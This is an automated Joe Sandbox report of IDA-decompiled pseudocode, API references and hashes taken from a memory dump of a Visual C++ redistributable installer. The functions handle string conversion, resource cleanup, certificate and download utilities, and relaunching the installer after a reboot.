                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: <$@Met$uriutil.cpp
                                                                          • API String ID: 1452528299-1405237575
                                                                          • Opcode ID: a6348f9a61e91fe5f6a370b2968c09c3fbd3ebd952e92b7611f8f21b71e1410d
                                                                          • Instruction ID: d1e6a3e35db9a9a3fee42af542cbe8eb411c71204e1693ce1c10545e09b47b99
                                                                          • Opcode Fuzzy Hash: a6348f9a61e91fe5f6a370b2968c09c3fbd3ebd952e92b7611f8f21b71e1410d
                                                                          • Instruction Fuzzy Hash: EE51ED71D012289BDB21DF65CC88ADAB7F8AF48701F4081E6AD49B7211DB319E988F61
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 86%
                                                                          			E000490AA(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                                                                          				signed int _v8;
                                                                          				int _v12;
                                                                          				char _v16;
                                                                          				intOrPtr _v24;
                                                                          				char _v28;
                                                                          				void* _v40;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t34;
                                                                          				signed int _t40;
                                                                          				int _t46;
                                                                          				int _t53;
                                                                          				void* _t54;
                                                                          				int _t56;
                                                                          				signed int _t62;
                                                                          				int _t65;
                                                                          				short* _t66;
                                                                          				signed int _t67;
                                                                          				short* _t68;
                                                                          
                                                                          				_t64 = __edx;
                                                                          				_t34 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t34 ^ _t67;
                                                                          				E000419B7(_t54,  &_v28, __edx, _a4);
                                                                          				_t56 = _a24;
                                                                          				if(_t56 == 0) {
                                                                          					_t6 = _v24 + 8; // 0xe3e85006
                                                                          					_t53 =  *_t6;
                                                                          					_t56 = _t53;
                                                                          					_a24 = _t53;
                                                                          				}
                                                                          				_t65 = 0;
                                                                          				_t40 = MultiByteToWideChar(_t56, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                                          				_v12 = _t40;
                                                                          				if(_t40 == 0) {
                                                                          					L15:
                                                                          					if(_v16 != 0) {
                                                                          						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                                                                          					}
                                                                          					return E0003DE36(_t54, _v8 ^ _t67, _t64, _t65, _t66);
                                                                          				}
                                                                          				_t54 = _t40 + _t40;
                                                                          				asm("sbb eax, eax");
                                                                          				if((_t54 + 0x00000008 & _t40) == 0) {
                                                                          					_t66 = 0;
                                                                          					L11:
                                                                          					if(_t66 != 0) {
                                                                          						E0003F670(_t65, _t66, _t65, _t54);
                                                                          						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t66, _v12);
                                                                          						if(_t46 != 0) {
                                                                          							_t65 = GetStringTypeW(_a8, _t66, _t46, _a20);
                                                                          						}
                                                                          					}
                                                                          					L14:
                                                                          					E000491C7(_t66);
                                                                          					goto L15;
                                                                          				}
                                                                          				asm("sbb eax, eax");
                                                                          				_t48 = _t40 & _t54 + 0x00000008;
                                                                          				_t62 = _t54 + 8;
                                                                          				if((_t40 & _t54 + 0x00000008) > 0x400) {
                                                                          					asm("sbb eax, eax");
                                                                          					_t66 = E00045154(_t62, _t48 & _t62);
                                                                          					if(_t66 == 0) {
                                                                          						goto L14;
                                                                          					}
                                                                          					 *_t66 = 0xdddd;
                                                                          					L9:
                                                                          					_t66 =  &(_t66[4]);
                                                                          					goto L11;
                                                                          				}
                                                                          				asm("sbb eax, eax");
                                                                          				E00059DF0();
                                                                          				_t66 = _t68;
                                                                          				if(_t66 == 0) {
                                                                          					goto L14;
                                                                          				}
                                                                          				 *_t66 = 0xcccc;
                                                                          				goto L9;
                                                                          			}


                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,E3E85006,0004234D,00000000,00000000,00043382,?,00043382,?,00000001,0004234D,E3E85006,00000001,00043382,00043382), ref: 000490F7
                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00049180
                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00049192
                                                                          • __freea.LIBCMT ref: 0004919B
                                                                            • Part of subcall function 00045154: HeapAlloc.KERNEL32(00000000,?,?,?,00041E90,?,0000015D,?,?,?,?,000432E9,000000FF,00000000,?,?), ref: 00045186
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide$AllocHeapStringType__freea
                                                                          • String ID:
                                                                          • API String ID: 573072132-0
                                                                          • Opcode ID: 4f7af860d1da2258388fc981dd794852a686bd1e4f5de28d382dee39352af18f
                                                                          • Instruction ID: 3b6770700de53ae7bead225b6246da2e5697d0bd6072cbb43d23903dc15464af
                                                                          • Opcode Fuzzy Hash: 4f7af860d1da2258388fc981dd794852a686bd1e4f5de28d382dee39352af18f
                                                                          • Instruction Fuzzy Hash: C831CDB2A0021AABDF259F64DC49DEF7BA9EB41310F044139FC04D62A1E735DD54CBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00014E9C(void* __ebx, void* __ecx, void* __edi, struct _CRITICAL_SECTION* _a4) {
                                                                          				void* __esi;
                                                                          				void* _t38;
                                                                          				long _t66;
                                                                          				void* _t79;
                                                                          				void* _t80;
                                                                          				void* _t81;
                                                                          				struct _CRITICAL_SECTION* _t82;
                                                                          
                                                                          				_t81 = __edi;
                                                                          				_t80 = __ecx;
                                                                          				_t79 = __ebx;
                                                                          				_t82 = _a4;
                                                                          				_t31 =  *((intOrPtr*)(_t82 + 0x4e0));
                                                                          				if( *((intOrPtr*)(_t82 + 0x4e0)) != 0) {
                                                                          					E00011160(_t31);
                                                                          				}
                                                                          				_t32 =  *((intOrPtr*)(_t82 + 0x4d8));
                                                                          				if( *((intOrPtr*)(_t82 + 0x4d8)) != 0) {
                                                                          					E000554EF(_t32);
                                                                          				}
                                                                          				E00024B2B(_t82 + 0x4b8);
                                                                          				E00024B2B(_t82 + 0x4a0);
                                                                          				_t37 =  *((intOrPtr*)(_t82 + 0x49c));
                                                                          				if( *((intOrPtr*)(_t82 + 0x49c)) != 0) {
                                                                          					E000554EF(_t37);
                                                                          				}
                                                                          				_t38 =  *(_t82 + 0x3e4);
                                                                          				if(_t38 != 0) {
                                                                          					CloseHandle(_t38);
                                                                          					 *(_t82 + 0x3e4) =  *(_t82 + 0x3e4) & 0x00000000;
                                                                          				}
                                                                          				DeleteCriticalSection(_t82 + 0xd0);
                                                                          				E0001D79F(_t81, _t82 + 0xb8);
                                                                          				E0001BEFA(_t79, _t82 + 0x3d8);
                                                                          				E0001E79A(_t79, _t80, _t81, _t82 + 0x2f0);
                                                                          				E0001872B(_t79, _t82 + 0x88);
                                                                          				E0001B037(_t82, _t82 + 0xb0);
                                                                          				E00020704(_t80, _t82 + 0x100);
                                                                          				E0001D133(_t82, _t82 + 0x2b8);
                                                                          				E0001E647(_t80, _t82 + 0x2c0);
                                                                          				E0001C8F1(_t81, _t82 + 0x2b0);
                                                                          				E0001BB09(_t81, _t82 + 0x48);
                                                                          				E0001C6C4(_t81, _t82 + 0x2a8);
                                                                          				if( *((intOrPtr*)(_t82 + 0x40)) != 0) {
                                                                          					E000554EF( *((intOrPtr*)(_t82 + 0x40)));
                                                                          				}
                                                                          				if( *((intOrPtr*)(_t82 + 0x28)) != 0) {
                                                                          					E000554EF( *((intOrPtr*)(_t82 + 0x28)));
                                                                          				}
                                                                          				_t62 =  *((intOrPtr*)(_t82 + 0x408));
                                                                          				if( *((intOrPtr*)(_t82 + 0x408)) != 0) {
                                                                          					E000554EF(_t62);
                                                                          				}
                                                                          				_t63 =  *((intOrPtr*)(_t82 + 0x404));
                                                                          				if( *((intOrPtr*)(_t82 + 0x404)) != 0) {
                                                                          					E000554EF(_t63);
                                                                          				}
                                                                          				_t64 =  *((intOrPtr*)(_t82 + 0x400));
                                                                          				if( *((intOrPtr*)(_t82 + 0x400)) != 0) {
                                                                          					E000554EF(_t64);
                                                                          				}
                                                                          				_t65 =  *((intOrPtr*)(_t82 + 0x3f8));
                                                                          				if( *((intOrPtr*)(_t82 + 0x3f8)) != 0) {
                                                                          					E000554EF(_t65);
                                                                          				}
                                                                          				_t66 =  *(_t82 + 0x498);
                                                                          				if(_t66 != 0xffffffff) {
                                                                          					TlsFree(_t66);
                                                                          				}
                                                                          				DeleteCriticalSection(_t82);
                                                                          				return E0003F670(_t81, _t82, 0, 0x4e8);
                                                                          			}











                                                                          APIs
                                                                          • CloseHandle.KERNEL32(?,?,?,00000000,?,0001545F,?,?,?,?,?,?), ref: 00014EF6
                                                                          • DeleteCriticalSection.KERNEL32(?,?,?,00000000,?,0001545F,?,?,?,?,?,?), ref: 00014F0A
                                                                          • TlsFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0001545F,?,?), ref: 00014FF9
                                                                          • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0001545F,?,?), ref: 00015000
                                                                            • Part of subcall function 00011160: LocalFree.KERNEL32(?,?,00014EB3,?,00000000,?,0001545F,?,?,?,?,?,?), ref: 0001116A
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalDeleteFreeSection$CloseHandleLocal
                                                                          • String ID:
                                                                          • API String ID: 3671900028-0
                                                                          • Opcode ID: b40b79ef3eeca2e6523c9255e7f813807c6abf84315d2c02db63dc3aa87ad227
                                                                          • Instruction ID: 945af1d1f8289d793d9dd59bc597d1461c377f0be4d6adc6f68ce33ed1e9f597
                                                                          • Opcode Fuzzy Hash: b40b79ef3eeca2e6523c9255e7f813807c6abf84315d2c02db63dc3aa87ad227
                                                                          • Instruction Fuzzy Hash: 2F4196B1500B05ABDA60EBB4C89AFDB73ECAF04346F44082DB65AD3192DB34F5858B25
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 56%
                                                                          			E00055F0F(void* __ecx, intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, intOrPtr* _a20, intOrPtr* _a24, intOrPtr* _a28) {
                                                                          				char _v8;
                                                                          				intOrPtr* _t19;
                                                                          				intOrPtr* _t21;
                                                                          				void* _t39;
                                                                          				char _t41;
                                                                          				void* _t43;
                                                                          
                                                                          				_t39 =  !=  ? 0x84400200 : 0x84c00200;
                                                                          				_v8 = 0;
                                                                          				_t43 = E000121A5( &_v8, _a16, 0);
                                                                          				if(_t43 < 0) {
                                                                          					L13:
                                                                          					if(_v8 != 0) {
                                                                          						E000554EF(_v8);
                                                                          					}
                                                                          					return _t43;
                                                                          				}
                                                                          				_t19 = _a20;
                                                                          				if(_t19 == 0 ||  *_t19 == 0) {
                                                                          					L4:
                                                                          					_t41 =  *0x7a978(_a4, _a8, _v8, 0, 0, 0x7a7c4, _t39, 0);
                                                                          					if(_t41 != 0) {
                                                                          						_t21 = _a24;
                                                                          						if(_t21 == 0 ||  *_t21 == 0) {
                                                                          							L10:
                                                                          							 *_a28 = _t41;
                                                                          							_t41 = 0;
                                                                          							goto L11;
                                                                          						} else {
                                                                          							_push(0x40000000);
                                                                          							_push(0xffffffff);
                                                                          							_push(_t21);
                                                                          							_push(_t41);
                                                                          							if( *0x7a980() != 0) {
                                                                          								goto L10;
                                                                          							}
                                                                          							_t47 =  <=  ? GetLastError() : _t25 & 0x0000ffff | 0x80070000;
                                                                          							_t43 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t25 & 0x0000ffff | 0x80070000;
                                                                          							E000137D3(0x80004005, "dlutil.cpp", 0x244, _t43);
                                                                          							L11:
                                                                          							if(_t41 != 0) {
                                                                          								 *0x7a96c(_t41);
                                                                          							}
                                                                          							goto L13;
                                                                          						}
                                                                          					}
                                                                          					_t50 =  <=  ? GetLastError() : _t28 & 0x0000ffff | 0x80070000;
                                                                          					_t43 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t28 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "dlutil.cpp", 0x23e, _t43);
                                                                          					goto L13;
                                                                          				} else {
                                                                          					_t43 = E00011EF2( &_v8, _t19, 0);
                                                                          					if(_t43 < 0) {
                                                                          						goto L13;
                                                                          					}
                                                                          					goto L4;
                                                                          				}
                                                                          			}










                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: @Met$dlutil.cpp
                                                                          • API String ID: 1452528299-1896680629
                                                                          • Opcode ID: 2df2e5be8e5d57befc7a7c89efe0e10b3b1c22493101a01ff3a3bb6f09dd18f9
                                                                          • Instruction ID: 2d97900444b494ad341fbf2e1295c50342b0271e1ebcbe36f146f55ac63b476a
                                                                          • Opcode Fuzzy Hash: 2df2e5be8e5d57befc7a7c89efe0e10b3b1c22493101a01ff3a3bb6f09dd18f9
                                                                          • Instruction Fuzzy Hash: B5310572E00315BBEB219EA98C44BAB76ECEF41762B124129FD05E7190DB36CD50D7B1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 50%
                                                                          			E00055587(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                                                          				char _v8;
                                                                          				intOrPtr* _t29;
                                                                          				void* _t31;
                                                                          				void* _t34;
                                                                          
                                                                          				_t34 = 0;
                                                                          				_push( &_v8);
                                                                          				_push(0);
                                                                          				_push(_a8);
                                                                          				_v8 = 0;
                                                                          				_push(_a4);
                                                                          				if( *0x7a938() != 0) {
                                                                          					_t31 = E000138D4(_v8, 1);
                                                                          					if(_t31 != 0) {
                                                                          						_push( &_v8);
                                                                          						_push(_t31);
                                                                          						_push(_a8);
                                                                          						_push(_a4);
                                                                          						if( *0x7a938() != 0) {
                                                                          							_t29 = _a16;
                                                                          							 *_a12 = _t31;
                                                                          							_t31 = 0;
                                                                          							if(_t29 == 0) {
                                                                          								L10:
                                                                          								L11:
                                                                          								return _t34;
                                                                          							}
                                                                          							 *_t29 = _v8;
                                                                          							L8:
                                                                          							if(_t31 != 0) {
                                                                          								E00013999(_t31);
                                                                          							}
                                                                          							goto L10;
                                                                          						}
                                                                          						_t38 =  <=  ? GetLastError() : _t21 & 0x0000ffff | 0x80070000;
                                                                          						_t34 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t21 & 0x0000ffff | 0x80070000;
                                                                          						E000137D3(0x80004005, "certutil.cpp", 0x1f, _t34);
                                                                          						goto L8;
                                                                          					}
                                                                          					_t34 = 0x8007000e;
                                                                          					E000137D3(_t14, "certutil.cpp", 0x1b, 0x8007000e);
                                                                          					goto L10;
                                                                          				}
                                                                          				_t41 =  <=  ? GetLastError() : _t25 & 0x0000ffff | 0x80070000;
                                                                          				_t34 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t25 & 0x0000ffff | 0x80070000;
                                                                          				E000137D3(0x80004005, "certutil.cpp", 0x17, _t34);
                                                                          				goto L11;
                                                                          			}








                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,?,00029133,?,00000003,00000000,?), ref: 000555A6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: @Met$certutil.cpp
                                                                          • API String ID: 1452528299-2574553069
                                                                          • Opcode ID: d9e3382e49a30f2fb02e4a61d9a2091077b1bde6fb137736463cc8065fcbc64b
                                                                          • Instruction ID: ab19432d6634398d3f0a18d66bb196e5802e439f42c6301176f1acf782cda3dc
                                                                          • Opcode Fuzzy Hash: d9e3382e49a30f2fb02e4a61d9a2091077b1bde6fb137736463cc8065fcbc64b
                                                                          • Instruction Fuzzy Hash: 44210476A40625FBEB209BA58D14FEB7BE8DF44752F014015FD09EB150EB35CD0496E0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 38%
                                                                          			E0005898E(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                          				unsigned int _v8;
                                                                          				char _v12;
                                                                          				long _t22;
                                                                          				intOrPtr* _t34;
                                                                          				void* _t37;
                                                                          
                                                                          				_t34 = _a12;
                                                                          				_v8 = 0;
                                                                          				_v12 = 0;
                                                                          				if( *_t34 != 0) {
                                                                          					L2:
                                                                          					_t37 = E000127EA( *_t34,  &_v8);
                                                                          					if(_t37 < 0) {
                                                                          						L11:
                                                                          						return _t37;
                                                                          					}
                                                                          					_push( &_v12);
                                                                          					_push( &_v8);
                                                                          					_push( *_t34);
                                                                          					_push(_a8);
                                                                          					_push(_a4);
                                                                          					if( *0x7a988() != 0) {
                                                                          						goto L11;
                                                                          					}
                                                                          					_t22 = GetLastError();
                                                                          					if(_t22 != 0x7a) {
                                                                          						L9:
                                                                          						_t37 =  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
                                                                          						if(_t37 < 0) {
                                                                          							E000137D3(_t22, "inetutil.cpp", 0x6c, _t37);
                                                                          						}
                                                                          						goto L11;
                                                                          					}
                                                                          					_t25 = _v8 + 2;
                                                                          					_v8 = _v8 + 2;
                                                                          					_t37 = E00011EDE(_t34, _t25 >> 1);
                                                                          					if(_t37 < 0) {
                                                                          						goto L11;
                                                                          					} else {
                                                                          						_push( &_v12);
                                                                          						_push( &_v8);
                                                                          						_push( *_t34);
                                                                          						_push(_a8);
                                                                          						_push(_a4);
                                                                          						if( *0x7a988() != 0) {
                                                                          							_t22 = 0;
                                                                          						} else {
                                                                          							_t22 = GetLastError();
                                                                          						}
                                                                          						goto L9;
                                                                          					}
                                                                          				}
                                                                          				_t37 = E00011EDE(_t34, 0x40);
                                                                          				if(_t37 < 0) {
                                                                          					goto L11;
                                                                          				}
                                                                          				goto L2;
                                                                          			}









                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,000560E7,?,00000033,?,?,00000013,00000000), ref: 000589E5
                                                                          • GetLastError.KERNEL32(?,000560E7,?,00000033,?,?,00000013,00000000), ref: 00058A22
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: @Met$inetutil.cpp
                                                                          • API String ID: 1452528299-2500885081
                                                                          • Opcode ID: 1b1ae4d2db1d092b736196a6bb7d432217d549948a2c661eaee9309c3289f2e9
                                                                          • Instruction ID: d47e666be2942eb17124a381335eba8faec52b89595cea15f01c252c2fb802df
                                                                          • Opcode Fuzzy Hash: 1b1ae4d2db1d092b736196a6bb7d432217d549948a2c661eaee9309c3289f2e9
                                                                          • Instruction Fuzzy Hash: 96219232900129BBEF219BA4CC44AEFBBA8EF04751B118122FD05F6110EB35DE549BA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 44%
                                                                          			E00053119(void* __eax, intOrPtr* _a4, intOrPtr _a8, signed int* _a12) {
                                                                          				signed int _v8;
                                                                          				signed int _v12;
                                                                          				signed int _v20;
                                                                          				char _v28;
                                                                          				intOrPtr* _t36;
                                                                          				intOrPtr* _t39;
                                                                          				signed int _t40;
                                                                          				signed int _t41;
                                                                          				signed int* _t43;
                                                                          				void* _t46;
                                                                          				void* _t47;
                                                                          				void* _t51;
                                                                          
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				_v12 = _v12 & 0x00000000;
                                                                          				__imp__#2(_a8);
                                                                          				_t46 = __eax;
                                                                          				__imp__#8( &_v28);
                                                                          				_t39 = _a4;
                                                                          				_t47 =  *((intOrPtr*)( *_t39 + 0x44))(_t39,  &_v8);
                                                                          				if(_t47 >= 0) {
                                                                          					_t47 = E0005336E( &_v12, _v8, __eax,  &_v12);
                                                                          					if(_t47 != 1 && _t47 >= 0) {
                                                                          						_t36 = _v12;
                                                                          						_t47 =  *((intOrPtr*)( *_t36 + 0x20))(_t36,  &_v28);
                                                                          						_t51 = _t47;
                                                                          						if(_t51 >= 0 && _t51 == 0) {
                                                                          							_t43 = _a12;
                                                                          							if(_t43 != 0) {
                                                                          								_v20 = _v20 & 0x00000000;
                                                                          								 *_t43 = _v20;
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          				_t40 = _v8;
                                                                          				if(_t40 != 0) {
                                                                          					 *((intOrPtr*)( *_t40 + 8))(_t40);
                                                                          				}
                                                                          				_t41 = _v12;
                                                                          				if(_t41 != 0) {
                                                                          					 *((intOrPtr*)( *_t41 + 8))(_t41);
                                                                          				}
                                                                          				__imp__#9( &_v28);
                                                                          				if(_t46 != 0) {
                                                                          					__imp__#6(_t46);
                                                                          				}
                                                                          				return _t47;
                                                                          			}
















                                                                          APIs
                                                                          • SysAllocString.OLEAUT32(?), ref: 0005312C
                                                                          • VariantInit.OLEAUT32(?), ref: 00053138
                                                                          • VariantClear.OLEAUT32(?), ref: 000531AC
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 000531B7
                                                                            • Part of subcall function 0005336E: SysAllocString.OLEAUT32(?), ref: 00053383
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: String$AllocVariant$ClearFreeInit
                                                                          • String ID:
                                                                          • API String ID: 347726874-0
                                                                          • Opcode ID: f52d487ca9587826075b9da1b93bfbea2e6d79c1c4fe099a709b7c9fd0da60de
                                                                          • Instruction ID: 5aee7e4bc266169cbe51f3bd9e8ce8746018c23744ce8877458db0545440cb17
                                                                          • Opcode Fuzzy Hash: f52d487ca9587826075b9da1b93bfbea2e6d79c1c4fe099a709b7c9fd0da60de
                                                                          • Instruction Fuzzy Hash: 8C213D35901619AFCB14DFA5C848EAFBBF8AF44752F14015CED01A7220DB31AE09CB98
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 65%
                                                                          			E00014B80(void* __ecx, intOrPtr _a4, short _a8) {
                                                                          				char _v8;
                                                                          				void* _v12;
                                                                          				void* _v16;
                                                                          				void* _t38;
                                                                          
                                                                          				_v8 = 0;
                                                                          				_v12 = 0;
                                                                          				_v16 = 0;
                                                                          				_t38 = E0001F7F7(__ecx, _a4,  &_v8);
                                                                          				if(_t38 >= 0) {
                                                                          					_t38 = E000133D7( &_v12, 0);
                                                                          					if(_t38 >= 0) {
                                                                          						_t26 =  >  ? _v8 : 0x5b524;
                                                                          						_t38 = E0005082D(_v12,  >  ? _v8 : 0x5b524, _a8,  &_v16);
                                                                          						if(_t38 < 0) {
                                                                          							E0005012F(_t38, "Failed to re-launch bundle process after RunOnce: %ls", _v12);
                                                                          						}
                                                                          						L7:
                                                                          						if(_v16 != 0) {
                                                                          							CloseHandle(_v16);
                                                                          							_v16 = 0;
                                                                          						}
                                                                          						if(_v8 != 0) {
                                                                          							E000554EF(_v8);
                                                                          						}
                                                                          						if(_v12 != 0) {
                                                                          							E000554EF(_v12);
                                                                          						}
                                                                          						return _t38;
                                                                          					}
                                                                          					_push("Failed to get current process path.");
                                                                          					L2:
                                                                          					_push(_t38);
                                                                          					E0005012F();
                                                                          					goto L7;
                                                                          				}
                                                                          				_push("Unable to get resume command line from the registry");
                                                                          				goto L2;
                                                                          			}








                                                                          APIs
                                                                            • Part of subcall function 0001F7F7: RegCloseKey.ADVAPI32(00000000,?,?,00000001,00000000,00000000,?,?,00014B9F,?,?,00000001), ref: 0001F847
                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,?,?,00000001,00000000,?,?,?), ref: 00014C06
                                                                            • Part of subcall function 0005082D: CreateProcessW.KERNEL32 ref: 0005089A
                                                                            • Part of subcall function 0005082D: GetLastError.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 000508A4
                                                                            • Part of subcall function 0005082D: CloseHandle.KERNEL32(?,?,?,?,?,00000000,00000000,00000000), ref: 000508ED
                                                                            • Part of subcall function 0005082D: CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000000), ref: 000508FA
                                                                          Strings
                                                                          • Unable to get resume command line from the registry, xrefs: 00014BA5
                                                                          • Failed to re-launch bundle process after RunOnce: %ls, xrefs: 00014BF0
                                                                          • Failed to get current process path., xrefs: 00014BC4
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Close$Handle$CreateErrorLastProcess
                                                                          • String ID: Failed to get current process path.$Failed to re-launch bundle process after RunOnce: %ls$Unable to get resume command line from the registry
                                                                          • API String ID: 1572399834-642631345
                                                                          • Opcode ID: e6f6585edfd8ccf36f0e912e06a784c72c0f85a76fbae06017c0bf854b81ff15
